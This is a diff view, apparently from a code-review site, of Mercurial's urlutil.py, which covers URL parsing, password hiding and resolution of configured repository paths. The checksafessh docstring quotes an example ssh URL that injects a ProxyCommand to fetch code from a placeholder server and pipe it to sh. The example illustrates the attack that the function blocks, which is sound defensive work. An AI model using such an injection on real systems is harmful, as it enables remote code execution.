Show More
@@ -1,776 +1,792 | |||
|
1 | 1 | # utils.urlutil - code related to [paths] management |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | import os |
|
8 | 8 | import re as remod |
|
9 | 9 | import socket |
|
10 | 10 | |
|
11 | 11 | from ..i18n import _ |
|
12 | 12 | from ..pycompat import ( |
|
13 | 13 | getattr, |
|
14 | 14 | setattr, |
|
15 | 15 | ) |
|
16 | 16 | from .. import ( |
|
17 | 17 | encoding, |
|
18 | 18 | error, |
|
19 | 19 | pycompat, |
|
20 | 20 | urllibcompat, |
|
21 | 21 | ) |
|
22 | 22 | |
|
23 | 23 | |
|
24 | 24 | if pycompat.TYPE_CHECKING: |
|
25 | 25 | from typing import ( |
|
26 | 26 | Union, |
|
27 | 27 | ) |
|
28 | 28 | |
|
# Module-level shorthand for the urllib request helpers exposed by
# urllibcompat; used below for quote() and unquote().
urlreq = urllibcompat.urlreq
|
30 | 30 | |
|
31 | 31 | |
|
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Resolve ``port`` to a numeric port.

    Anything ``int()`` accepts is converted and returned directly.
    Otherwise the value is treated as a service name and resolved with
    socket.getservbyname(); error.Abort is raised when no such service
    is known.
    """
    number = None
    try:
        number = int(port)
    except ValueError:
        # Not numeric: treat it as a service name below.
        pass
    if number is not None:
        return number

    service = pycompat.sysstr(port)
    try:
        resolved = socket.getservbyname(service)
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
    return resolved
|
51 | 51 | |
|
52 | 52 | |
|
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # Characters left unescaped when quoting user/passwd (see __bytes__).
    _safechars = b"!~*'()+"
    # Characters left unescaped when quoting path/fragment (see __bytes__).
    _safepchars = b"/!~*'()+:\\"
    # Matches a leading "<scheme>:" prefix.
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        """Parse ``path`` into its URL components.

        ``parsequery`` and ``parsefragment`` control whether ``?query`` and
        ``#fragment`` are split off or left embedded (see class docstring).

        Raises error.Abort for a ``file://`` URL whose host is not one of
        ``localhost``, ``127.0.0.1`` or ``[::1]``.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                # Remember the unsplit "host:port" form; localpath() uses it
                # to recognise a Windows drive letter parsed as a host.
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new ``url`` carrying the same components as this one."""
        # The constructor needs something to parse; every attribute it sets
        # is overwritten below, so the placeholder value does not matter.
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # The port must be carried over as well, otherwise the copy of
        # e.g. 'ssh://host:2200/repo' would silently lose ':2200'.
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        """Return ``<url name: value, ...>`` listing the non-None components."""
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local paths (and bundle: URLs) are emitted without any quoting.
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            # A drive-letter path needs the extra '/' (file:///c:/...).
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # Bracketed (IPv6 literal) hosts are emitted verbatim.
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url_without_credentials, authinfo)``.

        ``authinfo`` is None when no user is set; otherwise it is the tuple
        ``(None, (url, host), user, passwd)`` with ``passwd`` defaulting to
        ``b''``.
        """
        user, passwd = self.user, self.passwd
        try:
            # Temporarily drop the credentials to render the bare URL.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Return True for remote URLs and absolute local paths."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path for ``file``/``bundle`` URLs.

        For any other scheme (or no scheme) the string originally passed to
        the constructor is returned unchanged.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
|
396 | 396 | |
|
397 | 397 | |
|
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` parses as a URL with a scheme component."""
    parsed = url(path)
    # Explicit bool() so the declared return type holds (helps pytype).
    return bool(parsed.scheme)
|
401 | 401 | |
|
402 | 402 | |
|
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` begins with ``<letter>:`` (a drive prefix).

    Falsy input (empty bytes, None) yields False.
    """
    if not path:
        return False
    letter, separator = path[0:1], path[1:2]
    return separator == b':' and letter.isalpha()
|
406 | 406 | |
|
407 | 407 | |
|
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for ``path``.

    The input is parsed with query and fragment parsing disabled, so any
    '?' or '#' stays part of the path.
    """
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
|
411 | 411 | |
|
412 | 412 | |
|
def checksafessh(path):
    # type: (bytes) -> None
    """Reject ssh URLs whose host part would be read as an option (SEC)

    ssh parses a first item starting with '-' as an option, e.g.
    ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. Such URLs are
    refused outright rather than handed to ssh.

    Raises an error.Abort when the url is unsafe.
    """
    # Check the unquoted form so percent-encoding cannot hide the dash.
    decoded = urlreq.unquote(path)
    unsafe_prefixes = (b'ssh://-', b'svn+ssh://-')
    if decoded.startswith(unsafe_prefixes):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(decoded),)
        )
|
429 | 429 | |
|
430 | 430 | |
|
def hidepassword(u):
    # type: (bytes) -> bytes
    '''return the url string with any password replaced by ``***``'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
|
438 | 438 | |
|
439 | 439 | |
|
def removeauth(u):
    # type: (bytes) -> bytes
    '''return the url string with user and password stripped'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
|
446 | 446 | |
|
447 | 447 | |
|
def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`

    Without any `dests`, the configured `default-push` path is used,
    falling back to `default`; error.ConfigError is raised when neither
    is configured.
    """
    if dests:
        for dest in dests:
            yield ui.getpath(dest)
        return

    # No explicit destination: use the first configured default.
    for name in (b'default-push', b'default'):
        if name in ui.paths:
            yield ui.paths[name]
            return

    raise error.ConfigError(
        _(b'default repository not configured!'),
        hint=_(b"see 'hg help config.paths'"),
    )
|
463 | 463 | |
|
464 | 464 | |
|
def get_pull_paths(repo, ui, sources, default_branches=()):
    """yields all the `(path, branch)` selected as pull source by `sources`

    An empty `sources` means the `default` path.
    """
    for source in sources or [b'default']:
        if source in ui.paths:
            location = ui.paths[source].rawloc
        else:
            # Not a configured name: try it as a local path or URI.
            try:
                # the ui instance is passed along because building the
                # path may need to issue warnings
                location = path(ui, None, rawloc=source).rawloc
            except ValueError:
                location = source
        yield parseurl(location, default_branches)
|
480 | 480 | |
|
481 | 481 | |
|
def get_unique_push_path(action, repo, ui, dest=None):
    """return the single `path` selected as push destination

    Meant for commands and actions that do not support multiple
    destinations (yet).

    Note that for now, we cannot get multiple destinations, so this
    function is "trivial".

    The `action` parameter is intended for the error message.
    """
    requested = [] if dest is None else [dest]
    selected = list(get_push_paths(repo, ui, requested))
    assert len(selected) == 1
    return selected[0]
|
499 | 499 | |
|
500 | 500 | |
|
def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
    """return the single `(path, branch)` selected as pull source

    Meant for commands and actions that do not support multiple
    sources (yet).

    Note that for now, we cannot get multiple sources, so this function
    is "trivial".

    The `action` parameter is intended for the error message.
    """
    if source is None:
        if b'default' in ui.paths:
            location = ui.paths[b'default'].rawloc
        else:
            # XXX this is the historical default behavior, but that is not
            # great, consider breaking BC on this.
            location = b'default'
    elif source in ui.paths:
        location = ui.paths[source].rawloc
    else:
        # Not a configured name: try it as a local path or URI.
        try:
            # the ui instance is passed along because building the path
            # may need to issue warnings
            location = path(ui, None, rawloc=source).rawloc
        except ValueError:
            location = source
    return parseurl(location, default_branches)
|
529 | 529 | |
|
530 | 530 | |
|
def get_clone_path(ui, source, default_branches=()):
    """return the `(origsource, path, branch)` selected as clone source"""
    if source is None:
        if b'default' in ui.paths:
            origsource = ui.paths[b'default'].rawloc
        else:
            # XXX this is the historical default behavior, but that is not
            # great, consider breaking BC on this.
            origsource = b'default'
    elif source in ui.paths:
        origsource = ui.paths[source].rawloc
    else:
        # Not a configured name: try it as a local path or URI.
        try:
            # the ui instance is passed along because building the path
            # may need to issue warnings
            origsource = path(ui, None, rawloc=source).rawloc
        except ValueError:
            origsource = source
    clone_path, branch = parseurl(origsource, default_branches)
    return origsource, clone_path, branch
|
536 | 552 | |
|
537 | 553 | |
|
def parseurl(path, branches=None):
    '''parse url#branch, returning (url, (branch, branches))

    A non-empty fragment becomes ``branch`` and is removed from the
    returned url; ``branches`` defaults to an empty list.
    '''
    parsed = url(path)
    branch = None
    fragment = parsed.fragment
    if fragment:
        branch = fragment
        parsed.fragment = None
    if not branches:
        branches = []
    return bytes(parsed), (branch, branches)
|
546 | 562 | |
|
547 | 563 | |
|
class paths(dict):
    """A mapping of path names to ``path`` objects.

    The content is built from the ``[paths]`` section of the config
    loaded by a ui instance.
    """

    def __init__(self, ui):
        """Populate the mapping from ``ui``'s ``[paths]`` section."""
        dict.__init__(self)

        for name, loc in ui.configitems(b'paths', ignoresub=True):
            if loc:
                loc, sub_opts = ui.configsuboptions(b'paths', name)
                self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
            # else: no location is the same as not existing.

        # Once every entry exists, let each one resolve its reference to
        # other entries, in name order.
        for name in sorted(self):
            self[name].chain_path(ui, self)

    def getpath(self, ui, name, default=None):
        """Look up a ``path`` by name or location.

        ``name`` can be a named path or a location, i.e. a filesystem
        path or URI. ``default`` (a single name or a tuple/list of names)
        is only consulted when ``name`` is None.

        Returns None when ``name`` is None and no default matches, or when
        ``name`` is empty. Raises error.RepoError when ``name`` is neither
        a registered path nor a usable location.
        """
        if name is None:
            # Only fall back to default if no path was requested.
            if not default:
                candidates = ()
            elif isinstance(default, (tuple, list)):
                candidates = default
            else:
                candidates = (default,)
            for candidate in candidates:
                try:
                    return self[candidate]
                except KeyError:
                    pass
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        try:
            return self[name]
        except KeyError:
            # Not a registered name: try it as a local path or URI.
            try:
                # the ui instance is passed along because building the
                # path may need to issue warnings
                return path(ui, None, rawloc=name)
            except ValueError:
                raise error.RepoError(_(b'repository %s does not exist') % name)
|
604 | 620 | |
|
605 | 621 | |
|
# Registry of path sub-options: maps the sub-option name to a
# ``(attribute name, processing function)`` pair.
_pathsuboptions = {}


def pathsuboption(option, attr):
    """Decorator registering the handler of a path sub-option.

    ``option`` is the sub-option name and ``attr`` the attribute it sets
    on ``path`` instances.

    The decorated function is called with a ``ui`` instance, the ``path``
    instance and the string value of the option from the config; whatever
    it returns is stored on the ``path`` instance.

    Handlers can use this to validate a sub-option or to convert its
    value to another type.
    """

    def register(func):
        entry = (attr, func)
        _pathsuboptions[option] = entry
        # Hand the function back unchanged so it stays directly callable.
        return func

    return register
|
629 | 645 | |
|
630 | 646 | |
|
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
    """Process the ``pushurl`` sub-option into the ``pushloc`` value.

    Returns None (after a warning) when ``value`` has no URL scheme.
    A ``#fragment`` is dropped with a warning.
    """
    parsed = url(value)

    # Actually require a URL.
    if not parsed.scheme:
        ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
        return None

    # Don't support the #foo syntax in the push URL to declare branch to
    # push.
    if parsed.fragment:
        warning = _(
            b'("#fragment" in paths.%s:pushurl not supported; '
            b'ignoring)\n'
        )
        ui.warn(warning % path.name)
        parsed.fragment = None

    return bytes(parsed)
|
652 | 668 | |
|
653 | 669 | |
|
@pathsuboption(b'pushrev', b'pushrev')
def pushrevpathoption(ui, path, value):
    """Process the ``pushrev`` sub-option: the config value is kept as is."""
    return value
|
657 | 673 | |
|
658 | 674 | |
|
class path(object):
    """A single configured path together with its sub-options."""

    def __init__(self, ui, name, rawloc=None, suboptions=None):
        """Build a path from its config options.

        ``ui`` is the ``ui`` instance the path is coming from.
        ``name`` is the symbolic name of the path.
        ``rawloc`` is the raw location, as defined in the config.
        ``suboptions`` holds the sub-options set for this specific path;
        they take precedence over the ``*`` sub-options read from ``ui``.

        Without a ``name``, the location must be either a local filesystem
        path containing a .hg directory or a URL; otherwise ``ValueError``
        is raised. ``ValueError`` is also raised for an empty ``rawloc``.
        """
        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        # Locations may define branches via syntax <base>#<branch>.
        parsed = url(rawloc)
        fragment = parsed.fragment
        if fragment:
            parsed.fragment = None
            self.branch = fragment
        else:
            self.branch = None

        self.url = parsed
        # the url from the config/command line before dealing with `path://`
        self.raw_url = parsed.copy()

        self.name = name
        self.rawloc = rawloc
        self.loc = b'%s' % parsed

        self._validate_path()

        # Start from the `*` sub-options, then layer this path's own
        # sub-options on top.
        _path, merged = ui.configsuboptions(b'paths', b'*')
        if suboptions is None:
            self._own_sub_opts = {}
        else:
            self._own_sub_opts = suboptions.copy()
            merged.update(suboptions)
        self._all_sub_opts = merged.copy()

        self._apply_suboptions(ui, merged)

    def chain_path(self, ui, paths):
        """Resolve a ``path://<name>`` location against ``paths``.

        Does nothing unless this path uses the ``path`` scheme. Otherwise
        the url, location and sub-options of the referenced entry are
        adopted; this path's own branch and sub-options take precedence.

        Raises error.Abort when the referenced name is unknown or is
        itself a ``path://`` entry.
        """
        if self.url.scheme != b'path':
            return

        assert self.url.path is None
        target = self.url.host
        try:
            subpath = paths[target]
        except KeyError:
            m = _(b'cannot use `%s`, "%s" is not a known path')
            m %= (self.rawloc, target)
            raise error.Abort(m)
        if subpath.raw_url.scheme == b'path':
            m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
            m %= (self.rawloc, target)
            raise error.Abort(m)

        self.url = subpath.url
        self.loc = subpath.loc
        if self.branch is None:
            self.rawloc = subpath.rawloc
            self.branch = subpath.branch
        else:
            # Keep our own branch: swap it in for whatever fragment the
            # referenced raw location carries.
            base = subpath.rawloc.rsplit(b'#', 1)[0]
            self.rawloc = b'%s#%s' % (base, self.branch)

        combined = subpath._all_sub_opts.copy()
        combined.update(self._own_sub_opts)
        self._apply_suboptions(ui, combined)

    def _validate_path(self):
        """Raise ``ValueError`` for an unnamed, non-URL, non-repo location."""
        # Only a raw location given without a symbolic name is validated.
        if self.name or self.url.scheme:
            return
        if self._isvalidlocalpath(self.loc):
            return
        raise ValueError(
            b'location is not a URL or path to a local '
            b'repo: %s' % self.rawloc
        )

    def _apply_suboptions(self, ui, sub_options):
        """Set one attribute per registered sub-option.

        The attribute of a registered sub-option is always set; it is None
        when ``sub_options`` has no entry for it, otherwise it is the value
        returned by the sub-option's processing function.
        """
        for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
            if suboption in sub_options:
                value = func(ui, self, sub_options[suboption])
            else:
                value = None
            setattr(self, attr, value)

    def _isvalidlocalpath(self, path):
        """Tell whether ``path`` is a directory containing a ``.hg`` directory.

        Kept as a separate method so that extensions can change what counts
        as 'valid' here (like when pulling from a git repo into a hg
        one)."""
        try:
            hgdir = os.path.join(path, b'.hg')
            return os.path.isdir(hgdir)
        # Python 2 may return TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False

    @property
    def suboptions(self):
        """Return the sub-options of this path whose value is not None.

        This is intended to be used for presentation purposes.
        """
        shown = {}
        for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
            current = getattr(self, attr)
            if current is None:
                continue
            shown[subopt] = current
        return shown
General Comments 0
You need to be logged in to leave comments.
Login now